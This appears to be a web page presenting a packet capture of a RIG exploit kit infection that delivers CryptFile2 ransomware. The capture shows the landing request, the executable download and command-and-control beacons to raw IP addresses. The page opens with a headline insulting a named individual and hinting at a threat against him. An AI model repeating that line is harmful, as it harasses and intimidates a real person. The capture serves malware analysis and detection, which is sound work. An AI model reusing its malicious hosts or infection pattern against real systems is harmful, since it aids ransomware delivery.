Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

RIG Exploit Kit EK Delivers Ransomware Variant CryptFile2 Malware C2 PCAP file download

2016-09-19 09:49:33.246002 IP 192.168.4.57.49469 > 192.185.52.124.80: Flags [P.], seq 1:303, ack 1, win 16537, length 302: HTTP: GET / HTTP/1.1
E..V4 @….k…9..4|.=.P’…….P.@..F..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: photos2tile.com
Connection: Keep-Alive
Cookie: PHPSESSID=11621c75d998a91f4a371effa2d932a8


2016-09-19 09:49:40.123529 IP 192.168.4.57.49490 > 31.184.193.187.80: Flags [.], ack 1, win 16537, length 0
E..(D.@……..9…..R.P.U/~.I..P.@………..
2016-09-19 09:49:40.123610 IP 192.168.4.57.49491 > 31.184.193.187.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: GET / HTTP/1.1
E..AD.@……..9…..S.P…….ZP.@.p<..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://photos2tile.com/
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.autogrs.party
Connection: Keep-Alive

2016-09-19 09:49:43.630996 IP 192.168.4.57.49493 > 109.234.36.38.80: Flags [P.], seq 1155:1604, ack 27918, win 16265, length 449: HTTP: GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
E…NF@…S….9m.$&.U.Pt…….P.?.A…GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: add.arielcatering.com
Connection: Keep-Alive

2016-09-19 09:49:43.816016 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], ack 1604, win 258, length 0
E..(S.@.8…m.$&…9.P.U….t…P…V…
2016-09-19 09:49:44.884404 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], seq 27918:29268, ack 1604, win 258, length 1350: HTTP: HTTP/1.1 200 OK
E..nS.@.8…m.$&…9.P.U….t…P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Sep 2016 13:49:46 GMT
Content-Type: application/x-msdownload
Content-Length: 98304
Connection: keep-alive
Accept-Ranges: bytes

016-09-19 09:49:50.836417 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 1:154, ack 1, win 16537, length 153: HTTP: GET /headers.jpg HTTP/1.1
E…O.@……..9…n.V.P….(_..P.@…..GET /headers.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 176.31.127.110
Cache-Control: no-cache

2016-09-19 09:49:51.102944 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [.], ack 154, win 237, length 0
E..(..@.3.R;…n…9.P.V(_……P…A…
2016-09-19 09:49:51.370886 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [P.], seq 1:234, ack 154, win 237, length 233: HTTP: HTTP/1.1 200 OK
E…..@.3.QQ…n…9.P.V(_……P…….HTTP/1.1 200 OK
Date: Mon, 19 Sep 2016 13:50:08 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: “7-5332e92dca840”
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg

default
2016-09-19 09:49:51.371212 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [.], ack 234, win 16479, length 0
E..(O.@……..9…n.V.P….(_.{P.@_.0……..
2016-09-19 09:49:54.845384 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 154:331, ack 234, win 16479, length 177: HTTP: POST /zig/offers.php HTTP/1.1
E…O.@……..9…n.V.P….(_.{P.@_….POST /zig/offers.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 176.31.127.110
Content-Length: 1395
Cache-Control: no-cache

 

Leave a Reply